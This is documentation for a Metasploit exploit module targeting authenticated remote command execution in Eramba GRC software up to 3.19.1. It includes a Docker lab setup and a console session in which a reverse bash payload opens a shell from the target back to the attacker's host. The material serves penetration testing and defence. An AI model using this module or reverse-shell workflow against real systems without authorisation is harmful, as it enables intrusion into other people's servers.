adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
6d9d9a70d410cc94de4d3d9afd7a75cd426d43be
metasploit-gs/documentation/modules/exploit/linux/http/eramba_rce.md
T
cgranleese-r7 469f102596 Updates docs to reflect new default prompt
2025-07-17 09:53:40 +01:00

158 lines
4.8 KiB
Markdown
Raw Blame History

## Vulnerable Application
Eramba is open and free GRC software, used by many companies. It offer mainly risk management solution. Version up to 3.19.1 is vulnerable to authenticated remote command execution. It is neccessary to provide valid credentials. The application allows to execute arbitrary OS commands, which can lead to remote access. Application is available in [Docker format](https://www.eramba.org/learning/courses/12/episodes/274). However, after installation, debug mode needs to be enabled. Here's modified Docker compose file for simpler testing (`docker-compose.simple-install.yml`):
### Installation
Docker and docker-compose is required.
1. git clone https://github.com/eramba/docker
2. cd docker
3. Setup database credentials and public URL in `.env`
4. Copy following into `docker-compose.simple-install.yml`
```
version: '3.19'
services:
mysql:
container_name: mysql
image: mysql:8.0.28-oracle
command: ["mysqld", "--disable-log-bin"]
restart: always
volumes:
- db-data:/var/lib/mysql
- ./mysql/conf.d:/etc/mysql/conf.d
- ./mysql/entrypoint:/docker-entrypoint-initdb.d
environment:
MYSQL_DATABASE: ${DB_DATABASE}
MYSQL_USER: ${DB_USERNAME}
MYSQL_PASSWORD: ${DB_PASSWORD}
MYSQL_ROOT_PASSWORD: ${MYSQL_ROOT_PASSWORD}
redis:
container_name: redis
image: redis:6.0.16-alpine
restart: always
eramba:
container_name: eramba
image: ghcr.io/eramba/eramba:3.19.1
restart: always
ports:
- 8443:443
volumes:
- data:/var/www/eramba/app/upgrade/data
- app:/var/www/eramba
- logs:/var/www/eramba/app/upgrade/logs
- ./apache/ssl/mycert.crt:/etc/ssl/certs/mycert.crt
- ./apache/ssl/mycert.key:/etc/ssl/private/mycert.key
- ./apache/security.conf:/etc/apache2/conf-available/security.conf
- ./apache/ports.conf:/etc/apache2/ports.conf
- ./apache/vhost-ssl.conf:/etc/apache2/sites-available/000-default.conf
- ./crontab/crontab:/etc/cron.d/eramba-crontab
environment:
DB_HOST: ${DB_HOST}
DB_DATABASE: ${DB_DATABASE}
DB_USERNAME: ${DB_USERNAME}
DB_PASSWORD: ${DB_PASSWORD}
CACHE_URL: ${CACHE_URL}
USE_PROXY: ${USE_PROXY}
PROXY_HOST: ${PROXY_HOST}
PROXY_PORT: ${PROXY_PORT}
USE_PROXY_AUTH: ${USE_PROXY_AUTH}
PROXY_AUTH_USER: ${PROXY_AUTH_USER}
PROXY_AUTH_PASS: ${PROXY_AUTH_PASS}
PUBLIC_ADDRESS: ${PUBLIC_ADDRESS}
DOCKER_DEPLOYMENT: ${DOCKER_DEPLOYMENT}
LDAPTLS_REQCERT: ${LDAPTLS_REQCERT}
links:
- mysql
- redis
depends_on:
- mysql
cron:
container_name: cron
image: ghcr.io/eramba/eramba:3.19.1
command: ["cron", "-f"]
entrypoint: ["/docker-cron-entrypoint.sh"]
restart: always
volumes:
- data:/var/www/eramba/app/upgrade/data
- app:/var/www/eramba
- logs:/var/www/eramba/app/upgrade/logs
- ./docker-cron-entrypoint.sh:/docker-cron-entrypoint.sh
- ./crontab/crontab:/etc/cron.d/eramba-crontab
- .env:/var/www/docker.env
environment:
DB_HOST: ${DB_HOST}
DB_DATABASE: ${DB_DATABASE}
DB_USERNAME: ${DB_USERNAME}
DB_PASSWORD: ${DB_PASSWORD}
CACHE_URL: ${CACHE_URL}
USE_PROXY: ${USE_PROXY}
PROXY_HOST: ${PROXY_HOST}
PROXY_PORT: ${PROXY_PORT}
USE_PROXY_AUTH: ${USE_PROXY_AUTH}
PROXY_AUTH_USER: ${PROXY_AUTH_USER}
PROXY_AUTH_PASS: ${PROXY_AUTH_PASS}
PUBLIC_ADDRESS: ${PUBLIC_ADDRESS}
DOCKER_DEPLOYMENT: ${DOCKER_DEPLOYMENT}
LDAPTLS_REQCERT: ${LDAPTLS_REQCERT}
links:
- mysql
- redis
- eramba
depends_on:
- eramba
volumes:
app:
data:
logs:
db-data:
```
5. `docker compose -f docker-compose.simple-install.yml up -d`
Shut down: `docker compose -f docker-compose.simple-install.yml down`
## Verification Steps
1. use exploit/linux/http/eramba_rce
2. set RHOSTS [target IP]
3. set LHOST [attacker's IP]
4. set USERNAME [username]
5. set PASSWORD [password]
6. exploit
## Options
### USERNAME
A valid username for Eramba application
### PASSWORD
A valid password for Eramba application
## Scenarios
```
msf > use exploit/linux/http/eramba_rce
[*] Using configured payload cmd/unix/reverse_bash
msf exploit(linux/http/eramba_rce)> set RHOSTS 192.168.95.145
RHOSTS => 192.168.95.145
msf exploit(linux/http/eramba_rce)> set LHOST 192.168.95.142
LHOST => 192.168.95.142
msf exploit(linux/http/eramba_rce)> set USERNAME admin
USERNAME => admin
msf exploit(linux/http/eramba_rce)> set PASSWORD P4ssw0rd!
PASSWORD => P4ssw0rd!
msf exploit(linux/http/eramba_rce) > exploit
[*] Started reverse TCP handler on 192.168.95.142:4444
[*] Command shell session 1 opened (192.168.95.142:4444 -> 192.168.95.145:38460) at 2025-03-13 12:31:26 +0100
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
Reference in New Issue View Git Blame Copy Permalink